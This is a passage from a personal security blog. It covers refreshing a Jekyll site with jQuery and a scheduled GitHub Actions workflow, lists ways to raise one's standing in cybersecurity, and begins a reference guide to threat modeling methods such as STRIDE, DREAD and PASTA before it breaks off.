One component idea I had for the statboard was to have a counter of named vulnerabilities. So how could I grab that value from the page? At first, I tried fetching the DOM element with the id in which the count was exposed. However this failed because fetching that element alone meant not fetching the JS and other HTML content that was used to actually generate that count. To solve for this, I used jQuery to load the entire page into a temporary <div> tag, then iterated through the list (<li>) elements within that div (similar to how I calculate it on the origin page), and then finally set the dashboard component to the calculated count!

$('<div></div>').load('/infosec-blogs', function () {
  var blogs = $("li",this).length;
  $("#iblogs").html(blogs);
});

Additional notes on the use of JS and jQuery

I used Google’s Hosted Libraries to reference jQuery <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>.
Be weary of adding JS comments // in Markdown files as I noticed the Jekyll parsing engine doesn’t do a great job of new-lining, and thus everything after a comment will end up being commented.
When using Liquid tags in in-line JS, ensure quotes (‘’,””) are added around the templates so that the JS code will recognize those values as strings (where applicable).
The ability to add raw, arbitrary JS means there is a lot of untapped capability to add dynamic content to an otherwise static page. Keep in mind though that JS code is client-side, so you are still limited in that typical server-side functionality is not available in this context.

Git Actions

Thanks to the scenario I detailed in the Jekyll Liquid section, I was introduced to the world of Git Actions. Essentially, I needed a way to force an update / regeneration of my site such that one of my staticly generated Liquid tags would update at some minimum frequency (in this case, at least daily). After some Googling, I came across this action which allowed me to do just that! Essentially, it forces a blank build using a user-defined schedule as the trigger.

# File: .github/workflows/refresh.yml
name: Refresh

on:
  schedule:
    - cron:  '0 3 * * *' # Runs every day at 3am

jobs:
  refresh:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger GitHub pages rebuild
        run: |
          curl --fail --request POST \
            --url https://api.github.com/repos/${{ github.repository }}/pages/builds \
            --header "Authorization: Bearer $USER_TOKEN"
        env:
          # You must create a personal token with repo access as GitHub does
          # not yet support server-to-server page builds.
          USER_TOKEN: ${{ secrets.USER_TOKEN }}

In order to get this Action going, follow these steps…

Log into your GitHub account and go to Settings (in the top right) –> Developer settings –> Personal access tokens.
Generate new token and give it full repo access scope (More on OAuth scopes). I set mine to never expire, but you can choose what works best for you.
Navigate to your GitHub Pages site repo, ***.github.io –> Settings –> Secrets –> Actions section. Here you can add a New repository secret where you give it a unique name and set the value to the personal access token generated earlier.
In the root of your local site repository, create a .github/workflows/ folder (if one doesn’t already exist).
Create a <name of your choice>.yml file where you will have the actual Action code (like what was provided above).
Commit this Action file and you should be able to see run details in your repo –> Actions section within GitHub.

Additional Considerations for GitHub Actions

When using the Liquid tag {{ site.time }} with a Git Action triggered build, understand that it will use the time of the server which is generating the HTML, in this case the GitHub servers themselves, which means the date will be in UTC (Conversion help).
Check out this reference for informaton on how to specify the time zone in the front matter of a page or within the Jekyll config file.
GitHub Actions are awesome and powerful, but their are limitations to be aware of. Notably, it is important to understand the billing considerations. Free tier accounts get 2,000 minutes/month while Pro tier accounts (priced at about $44/user/year) get 3,000.
For reference, the refresh action (provided above) was running (for me) at about 13 seconds per trigger. This means you could run that action over 9,000 times without exceeding the minute cap for a Free-tier account.
With the above said, also consider that the default pages-build-deployment Action used by GitHub Pages to actually generate and deploy your site upon commit will also consume those allocated minutes. Upon looking at my Actions pane, I am seeing about 1m run-times for each build-and-deploy action trigger.

What’s Next

I’ve only just started to scratch the surface of how I can further extend and dynamize my Jekyll-based site. In future updates to this guide (or in future posts), I plan to cover more advanced GitHub Action capabilities as well as how else to add server-side functionality (maybe through serverless!) to the site. Stay tuned!

Boosting Your Cyber Clout

Thu, 25 Aug 2022 10:19:00 -0400

I engaged on a r/cybersecurity thread recently where the question was posed, how someone in the (cybersecurity) industry can “boost” their professional credentials, or otherwise increase their credibility, visibility, professional stature and general “cyber clout” - outside the traditional methods of education and certification. I thought this was a pretty interesting ask and as someone who has gone down this path a bit (having a blog, infosec-specific Mastodon account, etc…), I figured I would weigh in with other ideas (in no particular order) I had related to increasing said cred.

Publish research - Publishing research through a personal blog/website, academic institution, company blog, guest-submission on an external site, or through other research journals is a great way to get your ideas out in the wild.
- InfoSec Writeups on Medium Submission
- USENIX Paper Submission
- ResearchGate Publication Guidelines
- International Journal of Information Security Submission
- Journal of Information Security and Applications Submission
- Springer Open Publishing Guidelines
- Information Security Journal: A Global Perspective
- Bug Zero
- Hey, if you’re interested in writing for shellsharks, feel free to send me an email!

Speaking engagements - Speaking at conferences, internally at your company, through meetup groups, in online communities or even YouTube can certainly get your name and ideas out to a wide audience. Keep a look out for CFPs (Call for Papers) and Call for Speakers from known security conferences.

Teaching - Teaching is an excellent option for connecting with others in the industry and boosting credentials. This can come in many different forms - university professor, teaching for a training organization, developing a course for an online training platform, leading company-internal classes as an instructor or even developing your own training and offering it via the medium of your choice (e.g. your blog, YouTube, Twitch, whatever!)
- Become a SANS Instructor
- Become a Pluralsight Author
- Become a LinkedIn Instructor
- ThriveDX Instructor (formerly HackerU)
- Teach on Cybrary
- Teach on Udemy
- Coursera Teaching Center
- Open Security Training Submit Content

Blog / website - I’m a huge proponent of (professional) blogging and believe it comes with a multitude of benefits. You are able to publish research in your own way, expose custom tools, link out to all your other Internet points-of-presence and use it as a way to consistently engage with others in the community/cybersecurity field.

Social media presence - The preiminent form of online engagement. There are a multitude of social media services in which you can have a presence, engage with others in the community and grow your “brand”.
- Mastodon: There is a pretty sizable infosec community on Mastodon these days. There are a lot of potential instances to join, infosec.exchange is a great one for security pros! (You can find me @shellsharks.com)
- LinkedIn: Linkedin is an obvious option for connecting with professionals, posting content and meeting others in the industry.
- Other: Instagram, YouTube, Twitch and more. People consume information and media in many ways and these popular services are a medium to reach the multitudes.

Community engagement & networking - There are plenty of ways to connect with others in the industry. Many of which I’ve already covered! Linkedin (of course), conferences, meet-ups, etc… They say it’s not who you know, it’s who knows you, so get out there and introduce yourself to people!
- DEF CON Groups
- Meetup list from Rapid7
- DEF CON Forums
- List of Online Communities | Shellsharks
- Reddit: r/cybersecurity, r/netsec, r/netsecstudents
- Infosec Conferences
- Local OWASP Chapters
- BSides FrontPage
- SECDIM
- UpdatedSecurity
- Society of Information Risk Analysts
- Host a Community - Hosting a Discord server, Fediverse instance, Reddit community etc is a great way to network and gain visibility in the community.

Podcasting - Podcasting is a growing medium and one that is well suited for both a casual-listening audience and for those who want slightly more technical content. If talking is your medium rather than writing, podcasting could be a good choice for you!

Side business - Having a successful side business, or even starting up your own primary business is a good way to establish yourself as a doer in the field.

CVEs - For the vulnerability researchers of the world, having CVEs is an esteemed way to demonstrate your expertise. Request a CVE ID here.

CTFs - There are countless CTFs these days. Participating, winning & doing write-ups (CTF Time Writeups, Medium CTF Writeups, InfoSec Writeups | CTF) are all ways to express your interest / involvement in the field as well as your technical prowess.

Bug Bounty - Vulnerability disclosure programs (VDPs) and bug bounty platforms are in abundance these days. Earning bounties is not only a way to make some money but it can also help you stand out in the community.
- hackerone
- bugcrowd
- Look for companies with a security.txt file
- Alot of companies have their own bug bounty program: Microsoft, GitHub, Apple, etc…
- Hack the Pentagon
- Google Bug Hunters
- openbugbounty
- Zero Day Initiative
- Zerodium
- Pentester Land Bug Bounty Writeups
- Synack Red Team

Mentor - Helping others grow and succeed is always a noble pursuit and one that can not only yield great professional relationships, but also help set you apart as someone who gives back.

Volunteer - There are many organizations for which you can volunteer within the cybersecurity industry.

OSS contribution - A very tangible way of demonstrating programming skills and other domain knowledge is to contribute to open source software (OSS).

Publish a tool - The infosec community loves their tools and those that write and maintain these tools are held in particularly high regard.
- Porchetta Industries

High-profile / presitgious position - Holding a high-profile position in the government (e.g. CIA, NSA, FBI) or public company (e.g. FAANG) can give a moderate boost to your professional cred.

It’s worth pointing out that most of these methods are applicable to any profession, not just cybersecurity. Regardless of what you do, I urge you to approach all aspects of your professional climb with authenticity, novelty, approachability & humility.

The Enchiridion of Impetus Exemplar

Sat, 30 Jul 2022 03:50:00 -0400

A vade mecum for all things Threat Modeling.

Jump to Section

Intro to Threat Modeling
Methodologies
- Microsoft Threat Modeling
- PASTA
- OCTAVE
- Trike
- LINDDUN
- VAST
- NIST SP 800-154
- OWASP TMP
- TARA
- IDDIL/ATC
- hTMM
- QTMM
- ID³
Other Methodologies
Future Methodologies
Auxiliary Tools
- Control Frameworks
- Attack Libraries
- Vulnerability Catalogs
- Risk Assessment Models
- STRIDE
- DREAD
- Compliance Frameworks
- Cyber Threat Intelligence (CTI)
- Attack Trees
- Security Cards
- Persona non Grata (PnG)
Modeling Exercise(s) coming eventually!
Conclusion
Appendices
- Data Flow Diagram
- Threat Modeling Methodology Matrix coming eventually!
- Tooling
- Terminology
References

Intro to Threat Modeling

Threat Modeling can be defined as the process of building and analyzing representations of a system to highlight concerns about security characteristics. ¹

Threat Modeling is a pro-active and iterative approach for identifying security issues and reducing risk. The output of a threat modeling exercise is a list of threats - or even better - risks, that further inform decisions in the progressive lifecycle of a system. This process can be performed prior to any code written or infrastructure deployed. This makes it very efficient in identifying potential threats, vulnerabilities and risks.

Simplified Threat Modeling

There is a multitude of threat modeling methodologies, each of which have both individual uniqueness as well as mutual commonalities (Comparison Matrix). Fundamentally, each of these frameworks share the following two properties.

Document Scope : Scope the to-be-modeled system by inventorying the component architecture and diagramming the composite entities + the data flows that connect them. This should yield a list of identifiable assets & components, commonly visualized as a data flow diagram (DFD).
Enumerate Threats : Leveraging what we know about the system (i.e. list of technology components, applicable security controls, knowledge of threat actors, potential vulnerabilities), generate a list of potential threats.

The Threat Modeling Manifesto

The steps above represent an extreme distillation of the variety of threat modeling methodologies that exist today. The esteemed Threat Modeling Manifesto provides another example of a generic threat modeling process. This manifesto was created by a collective of threat modeling, security and privacy professionals. The steps they espouse are enumerated below. ¹

What are we working on?
What can go wrong?
What are we going to do about it?
Did we do a good enough job?

What’s peculiar about the Threat Modeling Manifesto is the delta between their definition of threat modeling and the stated “four key questions” of threat modeling. To explain, they define threat modeling as…

“Threat modeling is analyzing representations of a system to highlight concerns about security and privacy characteristics.”

Whereas within their 4-step question set they also include the act of developing risk treatments (“What are we going to do about it”), as well as following up on the efficacy of those applied countermeasures (“Did we do a good enough job”). My point being, that they are a little inconsistent between how they define threat modeling and the steps taken to perform a threat model. Maybe I’m just being a bit nit-picky though…

* In the past, I always considered “Threat Modeling” in the purest sense to be limited to just questions 1 & 2 from the Manifesto, or strictly, just the acts of documenting the system (inventorying components + DFD) and generating the threats. Now however, I realize that the prescription of security controls and subsequent re-factoring of threat risks is as applicable in the context of threat modeling as anything else. ²⁶

Benefits and Characteristics of Threat Modeling

Rather than me regurgitate a bunch of benefits of threat modeling, instead peruse this great Synopsys compilation of threat modeling advantages. ²

Detect problems early in the software development life cycle (SDLC)—even before coding begins.

Spot design flaws that traditional testing methods and code reviews may overlook.

Evaluate new forms of attack that you might not otherwise consider.

Maximize testing budgets by helping target testing and code review.

Identify security requirements.

Remediate problems before software release and prevent costly recoding post-deployment.

Think about threats beyond standard attacks and identify security issues unique to your application.

Keep frameworks ahead of the internal and external attackers relevant to your applications.

Highlight assets, threat agents, and controls to deduce components that attackers will target.

Model the location of threat agents, motivations, skills, and capabilities to locate potential attackers in relation to the system architecture.

So what makes a threat modeling methodology a good one? Consider now the following list of desirable traits and considerations. ²⁵

No (or low) false positives
No threat blind spots
Consistency, regardless of who performs the threat modeling exercise
Cost, time and resource-effective
Has tool support which helps scale and automate the various threat modeling activities
Suggests a process for prioritizing findings
Is easy / intutitive to learn and use, regardless of technical background
Has superior characteristics for specific types of systems and situations

Methodologies

This section will detail several (13) well-known (and not so well-known) threat modeling methodologies. They are presented in no real particular order, though I will say that the first half of the list does contain a higher concentration of the more popular models. There are also methodologies I plan to cover in the future and others I have evaluated, but only briefly cover (for one reason or another).

Microsoft Threat Modeling
PASTA
OCTAVE
Trike
LINDDUN
VAST
NIST SP 800-154
OWASP TMP
TARA
IDDIL/ATC
hTMM
QTMM
ID³
Other Methodologies

Before we dive into the various methodologies though, let’s cover a few commonly encountered supporting resources that these threat modeling methodologies generally rely on.

Control Frameworks

Control Frameworks provide security / privacy controls, requirements, countermeasures, best practices, standards, risk treatments and other recommendations for strengthening the security posture of a system.

ASVS | OWASP: A framework of security requirements / controls that can be employed when designing web applications.
ControlCatalog: TrustOnCloud’s controls library, the companion to their attack scenario library.
Controls Framework | Equifax: Yes, even Equifax has a publicly published controls framework!
CSF | NIST: A set of best practices, standards and recommendations used to improve cybersecurity in an organization.
D3FEND | MITRE: A knowledge graph of cybersecurity countermeasures.
LINDDUN Mitigation strategies and solutions: High-level view of common techniques used in-practice to prevent privacy threats.
Security4Startups: Checklist of the security controls you should consider implementing in a startup.
SSDF | NIST: A framework developed by NIST to facilitate the mitigation of risk in the SSDL.
SP 800-53 (Rev. 5) | NIST: Organization-wide security and privacy controls (not specific to applications).
Web Application Security Frame | Microsoft: A web application security frame is used to converge knowledge into an activity by identifying categories, vulnerabilities, threats, attacks and countermeasures.

Attack Libraries

Attack Libraries provide lists of of attack patterns, risks, exploits and techniques which can be used to compromise a system or its assets.

ATLAS | MITRE: (Adversarial Threat Landscape for Artificial-Intelligence Systems) A knowledge base of adversary tactics and techniques against Al-enabled systems.
ATT&CK | MITRE: Knowledge base of adversary tactics and techniques based on real-world observations.
- Read here to learn more about how MITRE’s CAPEC library compares to their ATT&CK framework.
Azure Threat Research Matrix
CAPEC | MITRE: A comprehensive dictionary of known attack patterns.
Cloud Threat Landscape: A comprehensive threat intelligence database of cloud security incidents, actors, tools and techniques.
Exploit-DB | OffSec: CVE-compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.
FiGHT | MITRE: Knowledge base of adversary Tactics and Techniques for 5G systems.
Fight Fraud Framework (F3) | MITRE: Curated knowledge base of tactics and techniques used by financial fraud actors, derived from real-world observations of cyber fraud incidents.
MAESTRO: Layer-based threat library specific to Agentic AI.
OSC&R: Open Software Supply Chain Attack Reference: A comprehensive, systematic and actionable way to understand attacker behaviors and techniques with respect to the software supply chain.
OWASP Top 10: A broad consensus of the most critical security risks to web applications.
PLOT4AI: Privacy Library of Threats 4 Artificial Intelligence (based on LINDDUN)
PR3TACK: Bridging the anticipatory gap in cybersecurity. While we can see and study what has been done, PR3TACK anticipates what could happen next.
Risk Explorer for Software Supply Chains: Taxonomy of known attacks and techniques to inject malicious code into open-source software projects.
SPACE-SHIELD: Space Attacks and Countermeasures Engineering Shield is an ATT&CK® like knowledge-base framework for Space Systems.
STRIDE: A simplified, categorical list of attacks developed by Microsoft.
TrustOnCloud ThreatModel for Amazon S3: A library of all the attack scenarios on Amazon S3

Vulnerability Catalogs

Vulnerability Catalogs are lists of known vulnerabilities, weaknesses and issues that affect specific software or classes of systems. A supplementary list of vulnerability-related tools can be found here.

CloudVulnDB: List all known cloud vulnerabilities and CSP security issues
!CVE: Vulnerabilities that are not acknowledged by vendors but still are serious security issues.
CVE | MITRE: A program which identifies, defines and catalogs publicly disclosed cybersecurity vulnerabilities. (CVE.org)
CWE | MITRE: Community-developed list of software and hardware weakness types.
Designer Vulnerabilities | Shellsharks: A list of “named” vulnerabilities.
European vulnerability database (EUVD) | ENISA
GCVE: Global CVE Allocation System is a new, decentralized approach to vulnerability identification and numbering, designed to improve flexibility, scalability, and autonomy for participating entities.
GhostCVEs: A Ghost CVE is a vulnerability identifier that appears in the wild (GitHub commits, security advisories, RSS feeds) but remains RESERVED or NOT_FOUND in official CVE registries like NVD and MITRE.
GlobalCVE
Global Security Database
Go Vulnerability Management: Database of Go vulnerabilities.
KEV (Known Exploited Vulnerabilities) catalog | CISA: Authoritative source of vulnerabilities that have been exploited in the wild, maintained by CISA.
LVE Repository
NVD | NIST: Government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP).
- Read here to learn more about the MITRE CVE vs. NIST NVD relationship.
Open CVDB: An open project to list all known cloud vulnerabilities and cloud service provider (CSP) security issues.
OpenCVE: Platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE…)
OSV: Known third-party open source dependency vulnerabilities.
RUSTSEC
Snyk Vulnerability Database: Database of open source vulnerabilities maintained by Snyk.
VulDB: Vulnerability database documenting and explaining security vulnerabilities, threats and exploits.
Vulnerable MCP Project: A comprehensive database of Model Context Protocol vulnerabilities, security research, and exploits.
WordPress Plugin Vulnerabilities

Risk Assessment Models

Risk Assessment Models are methodologies for determining risk based on known information about a system. They are used to understand, control and mitigate risk to an organization or system.

AI Risk Management Framework (AI RMF) | NIST: Manage risks to individuals, organizations, and society associated with artificial intelligence (AI)
AIVSS | OWASP: Calculate, visualize, and report on the security risks of autonomous AI systems
CMSS | NIST: The Common Misuse Score System: Metrics for Software Feature Misuse Vulnerabilities contains a set of measures of the severity of software feature misuse vulnerabilities.
CVSS | NIST: Open framework for communicating the characteristics and severity of software vulnerabilities. (Versions: v2, v3, v4)
DREAD: Quantitative risk model developed by Microsoft that is reminiscent of CVSS.
- * Similar to STRIDE, DREAD is often mistakenly referred to as a threat modeling methodology. It is in fact a model to quantitatively evaluate security risk.
EBIOS Risk Manager (EBIOS RM): Method for assessing and treating digital risks, published by the National Cybersecurity Agency of France (ANSSI) with the support of Club EBIOS.
EPSS: The Exploit Prediction Scoring System is an open, data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild.
FAIR: Factor Analysis of Information Risk (FAIR) is a methodology for quantifying and managing risk in any organization.
Harmonized TRA Methodology (TRA-1): Set of tools designed to address all assets, employees and services at risk - from the Canadian Centre for Cyber Security.
MORDA: A quantitative risk assessment and risk management process that uses risk analysis techniques and multiple objective decision analysis models to evaluate information system designs.
Mozilla’s Risk Assessment: Risk framework devised and used by Mozilla’s security team. The Rapid Risk Assessment (RRA) methodology is a formalized, reproducible and consistent framework for conducting risk assessments.
OWASP Risk Rating Methodology: OWASP’s approach to calculating risk (OWASP Risk Rating Calculator).
SCORES: Seconize Contextual Risk Enumeration System is a free risk scoring tool for vulnerabilities.
SP 800-30, Guide for Conducting Risk Assessments | NIST: Guidance for conducting risk assessments of federal information systems and organizations.
SSCV: Contextual Vulnerability Risk Scoring to transform CVSS scores into contextual risk assessments that reflect the actual threat to your specific systems.
SSVC | CISA: Stakeholder-Specific Vulnerability Categorization system is a vulnerability analysis methodology that accounts for a vulnerability’s exploitation status, impacts to safety, and prevalence of the affected product in a singular system.
Threat Agent Risk Assessment (TARA) | Intel: Methodology that distills the immense number of possible information security attacks into a digest of only those exposures most likely to occur.
VISS | Zoom: The Vulnerability Impact Scoring System (VISS) captures objective impact characteristics of software, hardware, and firmware vulnerabilities in relation to infrastructure, technology stack, and customer data security.

Microsoft Threat Modeling

Microsoft’s Threat Modeling framework is comprised of five major steps. Microsoft emphasizes the importance of threat modeling as part of an organizations routine SDL practice. ³

Microsoft Threat Modeling Steps

Define security requirements which reflect the legal/industry requirements, internal standards, previous incidents, known threats, data classification and business criticality of a system.
Diagram the application by drawing a data flow diagram (DFD) which depicts the processes, systems, data stores, data flows and other contextual information about an application/system.
Identify threats by leveraging an attack library or threat classification system such as STRIDE.
Mitigate threats by developing potential risk treatments which can be implemented by system owners to address identified threats.
Validate that threats have been mitigated by revisiting the threat model and adapting that model to account for changes introduced to the system as a result of previous mitigation efforts or functional changes.

Alongside this approach ³, Microsoft published a threat classification system known as STRIDE. Despite STRIDE having never been a particularly effective method for enumerating attacks ²⁸, it has nevertheless prevailed as the taxonomy of choice for the official Microsoft Threat Modeling tool which uses STRIDE for auto-enumerating potential attacks within a provided model.

You know who else loves Microsoft Threat Modeling and STRIDE? GitHub! (unsurprisingly)

STRIDE

STRIDE is a 6*-pronged threat classification model developed by Microsoft. * STRIDE is often mistakenly referred to as a threat modeling methodology, but it is in fact just a collection of 6 somewhat ²⁸ distinct threat classes. These threats and their respective desired security properties are listed below. ⁴

Threat	Security Property
Spoofing	Authenticity
Tampering	Integrity
Repudiation	Non-Repudiability
Information Disclosure	Confidentiality
Denial of Service (DoS)	Availability
Elevation of Privilege (EoP)	Authorization
* Lateral Movement (LM) ²⁴	Least-Privilege

Below is a matrix describing the STRIDE threat categories and how they typically apply to the elements of a standard data flow diagram (DFD). ²⁵

Element	S	T	R	I	D	E
Data Flow		X		X	X
Data Store		X		X	X
Processes	X	X	X	X	X	X
External Entity	X		X

DESIST

DESIST is a variant of STRIDE, it stands for Dispute, Elevation of Privilege, Spoofing, Information Disclosure, Service Denial and Tampering.

DREAD

DREAD is a threat / risk assessment model developed by Microsoft. It is comprised of the 5 metrics below. ⁵

Damage : Confidentiality, integrity and availability (CIA) impact.
Reproducibility : How often a specified type of attack will succeed.
Exploitability : Effort and expertise required to mount an attack.
Affected Users : Number/type of users that could be affected.
Discoverability : Likelihood of exploitation.

A simple way to use DREAD to quantitatively calculate risk would be to assign a value, 1-10 across each of the metrics above for each of the known threats / vulnerabilities applicable to a system. Once complete, take the average, which will yield the final (out of 10) risk score. This is similar in some ways to how CVSS is used to score risks. In fact, DREAD maps to CVSS (v3.1) as shown below. With all this said, the scoring methodology via DREAD is notably problematic. ²⁸

DREAD to CVSSv3 Matrix

DREAD Criteria	CVSS Metric(s)	CVSS Acronym
Damage	Impact, i.e. Confidentiality, Integrity & Availability	(C,I,A)
Reproducibility	Exploit Code Maturity	(E)
Exploitability	Attack Vector, Attack Complexity, Privileges Required, User Interaction	(AV, AC, PR, UI)
Affected Users	Scope	(S)
Discoverability	Remediation Level, Report Confidence	(RL, RC)

PASTA

Process for Attack Simulation and Threat Analysis (PASTA) is a risk-centric, threat-focused, evidence-based and highly collaborative threat modeling methodology. PASTA is composed of a 7-stage process. These stages are listed below, with subsequent sections that cover in detail each respective stage.

Stage 1: Define Objectives
Stage 2: Define Technical Scope
Stage 3: Application Decomposition
Stage 4: Threat Analysis
- Cyber Threat Intelligence (CTI)
Stage 5: Vulnerability & Weakness Analysis
Stage 6: Attack Modeling
- Attack Trees
Stage 7: Risk & Impact Analysis

For each stage of the PASTA threat modeling process I provide an I/O flow diagram which describes the respective inputs, processes and outputs for each stage. * I do not exhaustively cover each element of the respective stages as this would prove rather tedious and even overly informative. Rather, I will describe select pieces of each stage based on the elements I deem either un-obvious or particularly opaque given the stage-specific process-flow depiction alone. Where applicable, I’ll also provide additional instruction, context, commentary and analysis within each stage’s section. ⁶

PASTA Stage 1: Define Objectives

The inputs for Stage 1 require quite a bit of data gathering and cross-team collaboration. Some teams you may need to consult for these inputs are listed below…
- Business Requirements: Business partners from the department the target system resides in.
- Functional Requirements: (Software) Engineering team(s).
- Information Security Policies: Security team & security leadership.
- Regulatory Compliance Standards: GRC or Privacy team(s).
- Data Classification Documents: Enterprise architecture, IT or GRC teams.
Work with business stakeholders to understand business objectives.
To define security requirements, consider leveraging a methodology like SQUARE.
For defining compliance requirements, you’ll need to understand the regulatory / compliance frameworks your organization may be beholden to (and there are a lot of them).
Business Impact Analysis (BIA) report: I won’t cover conducting a BIA engagement within this guide. Please reference this great resource on BIA from Ready.gov if you want to learn more.
Application Profile: Any high-level description of the application and its functionality is suitable but the profile would ideally include information such as - application type (e.g. Internet-facing), data classification (e.g. public, confidential, restricted), business objectives, inherent risk, high risk transactions (e.g.yes/no), user roles, number of users, etc…
Like other methodologies covered in this guide, PASTA includes the development of formal security (and privacy) requirements. Personally, I think these should be implicit inputs into a threat modeling exercise, rather than an explicit output, but… </shrug>

Compliance Frameworks

Compliance is a necessary evil in the world of security and threat modeling. There is an overwhelming collection of compliance frameworks that govern industries around the world. Some examples include - Sarbanes-Oxley (SOX), PCI DSS, NIST CSF, SSAE-16, AT-101, FedRAMP, ISO, Privacy Shield, HIPAA, HITECH, SOC 2, CMMC, GDPR, CCPA, GLBA, PIPEDA, FISMA, CSA STAR, COBIT, FERPA, COPPA, NERC CIP, HEOA, HITRUST, etc… ³⁰^,³¹

PASTA Stage 2: Define Technical Scope

Similar to Stage 1, there are other teams that will likely need to be consulted for the required inputs, e.g. the network team and engineering team(s).
Technical Scope: Inventorying network, infrastructure and software components contributes to developing a holistic technical scope as well as for understanding the boundaries of a system. Example component elements include - application components, network topology, protocols/services (from existing data flow diagrams), use case scenarios (via sequence diagrams), assets (targeted data / sub-systems), security controls (e.g. authN/authZ, encryption, logging, etc…), data interactions (e.g. login, registration), technology types / versions, etc…
The technical scope derived in this stage is the basis for our understanding of the systems attack surface.

PASTA Stage 3: Application Decomposition

For reference, here’s a good definition of a design document.
Use case enumeration can be time-consuming and unwieldy depending on the size & scope of the target system.
This stage requires the development of a data flow diagram (DFD).
Controls Analysis: For each use case (transaction), determine the inherent risk, data classification in scope and security functions invoked for each control type (e.g. input validation, authN/authZ, session management, encryption, etc…). Note: This can be done in a spreadsheet.
“Explicit” vs “Implicit” trust: Are authorization (authZ) decisions made on context-aware rules (i.e. Zero Trust) or simply by whether you can communicate with something?
Access Control Matrix: A formal security model that characterizes the rights of actors with respect to assets in a system.
Use Case Mapping: Similar to Trike, PASTA demands the mapping of use flows.

PASTA Stage 4: Threat Analysis

* I find it a little strange, or just unnecessary, to bring straight-up application / SIEM logs into a threat modeling assessment, but that’s what PASTA wants as an input in this stage…
Attack Scenario Probability Analysis: Probability (i.e. likelihood) is factored using a plethora of security criteria (e.g. attack vector, attack complexity, privileges required, user interaction, exploit code availability, vulnerability patch level, in-line security controls, threat actor capability, threat actor infrastructure, threat actor motivation, etc…) - pretty much CVSS metrics.
Consider what threat intel can be developed from analyzing internal/external incident reports. Can we perform attribution? Are there identifable TTPs? Do we at a minimum have workable IoCs?
PASTA asks that we perform regression analysis on security events. What does that even mean? In this context, I suppose it means analyzing security events applicable to the target system and determining whether they have any real risk-implications.
Attack Scenarios are high-level descriptions of attack paths we will later model by using attack trees.
We can correlate CTI to our attack scenarios by mapping industry-applicable CTI to the threats / malicious actors proposed when we developed the attack scenarios.

Cyber Threat Intelligence (CTI)

Cyber Threat Intelligence (CTI) is a vast discipline, and not one I’m going to try and cover exhaustively or authoritatively here. Instead, I’ll cover a few key things for the purposes of understanding the application of CTI within the greater process of performing threat modeling. Let’s start with what makes something a “threat”. Threats can be defined as the cross-section of when a threat actor has the following…

Intent - The motivation/desire to attack a target.
Opportunity - Accessible attack surface that contains vulnerability.
Capability - Infrastructure, tooling, exploits and applicable TTPs to perform an attack. ⁷

This is further visualized using the well-known Diamond Model (depicted below). Each line represents a relationship of how an attacker might attack a target/victim, e.g. the Adversary uses Infrastructure and known Capabilities to attack Victim. ⁸

Below are some other assorted thoughts and resources related to CTI.

CTI-CMM - Cyber Threat Intelligence Maturity Model
Chad Warner has an interesting writeup on using the Diamond Model if you want to dive deeper on this topic.
Threat Intelligence can also be defined as, data that is collected, processed, and analyzed to understand a threat actor’s motives, targets, and attack behaviors. (source)
One important concept to understand related to CTI is the difference between Data, Information and Intelligence.
Intelligence should be actionable, enabling security teams to make better decisions.
A Cyber Threat Intelligence Self-Study Plan: Part 1, Part 2
Cyber Threat Intelligence Dashboard
A resource for public attribution by government organizations.
Threat Actors can be modeled based on existing threat profiles. Organizations like MITRE, Crowdstrike, Dragos, Mandiant, CFR, Google TAG, Microsoft & Secureworks track global threat actors and make these profiles publicly available.
Organizations and representative security teams typically consume threat intel through (integrated) feeds or via published reports (typically from the organizations I just listed). Good open-source CTI projects include MISP and OpenCTI.
Other external threat sources to consider include…
- IFIN
- Verizon’s annual Data Breach Investigations Report (DBIR)
- US Cert & CISA AIS
- SANS Internet Storm Center
- McAfee’s Threat Landscape Dashboard (Operation FINSHO)
- Emerging Threats & rules
- APT Groups and Operations | apt.threattracking
- Playbook Viewer | Unit42
- OTX AlienVault
- Electronic Transactions Development Agency (ETDA)
- MISP Galaxy Threat Actors
- Talos
- R-CISC. ⁹
- InfraGard
- BlockList.de
- PhishTank
- CINS Score
- Spamhaus
- VirusShare
- Google Safe Browsing
Traceability Matrices can be created to examine a threat agent. Controls can be mapped within the matrix to effectively mitigate the threat. Note: Similar results can be achieved from building attack trees, this is just one other medium. A traceability matrix is a 7-column table with the following fields. ¹⁰

Threat Agent --> Asset --> Attack --> Attack Surface --> Attack Goal --> Impact --> Control

PASTA Stage 5: Vulnerability & Weakness Analysis

To be honest, I’m not entirely sure what the difference between a threat tree and an attack tree is… Stage 5 asks that we develop threat trees while Stage 6 then asks us derive attack trees. (??) The only difference I can divine is the latter uses attack libraries as input, so perhaps attack trees use known attack data rather than theoretical paths?
Stage 5 requests the ingestion of vulnerability assessment reports, vuln-to-asset attribution and scored vulnerabilities. This can be done manually, or preferably, performed as part of a larger Vulnerability Management program (VMP).
Vulnerability Catalogs and vulnerability scoring systems like CVSS are heavily used in this stage.
Design Flaw Analysis: Evaluate use and abuse cases for ways an attacker might compromise a system.
For documenting threats-attacks-vulns-assets, a simple list or table will suffice. Try to maintain as much elemental affinity as possible (i.e. attempt to capture the relationships between threats, attacks, vulnerabilities and assets).

PASTA Stage 6: Attack Modeling

Now at Stage 6 we start to see many of the outputs from previous stages being fed back in as inputs (e.g. technical scope, decomposition, etc…)
Attack Surface Analysis: What this means exactly is a bit ambiguous and probably open to some interpretation. Generally, I would focus on a prioritized list of surface-area components based on data criticality and surface volume. Check out CrowdStrike’s take on Attack Surface Management.
Attack Trees are a big part of Stage 6.
What does it mean to manage our attack library? Well we have some attack libraries we can import, so my guess is it just means to update or add to an imported library of attacks (unless of course we maintain one ourselves). This is reminiscent of TARA, Step 3: Knowledge Management. ²³
Beyond the attack trees themselves, it could be additionally beneficial to map attack paths as overlays on top of the previously created DFD.

Attack Trees

Attack trees are hierarchical, graphical diagrams that show how low-level hostile activities interact and combine to achieve an adversary’s objectives. The goal of the attack is the root node, and the ways of achieving that goal are the leaf nodes. Like other decision trees, attack trees are inverted, with the flow beginning from the leaves up to the root. As an attacker progresses through the tree through the intermediate states, they may gain certain tactical benefits and achieve other impacts. ¹¹^,¹²

Here’s some more technical tid-bits on attack trees…

Attack trees have AND and OR nodes. For an attacker to progress, each leaf node must be achieved per the condition of its parent node. ¹²
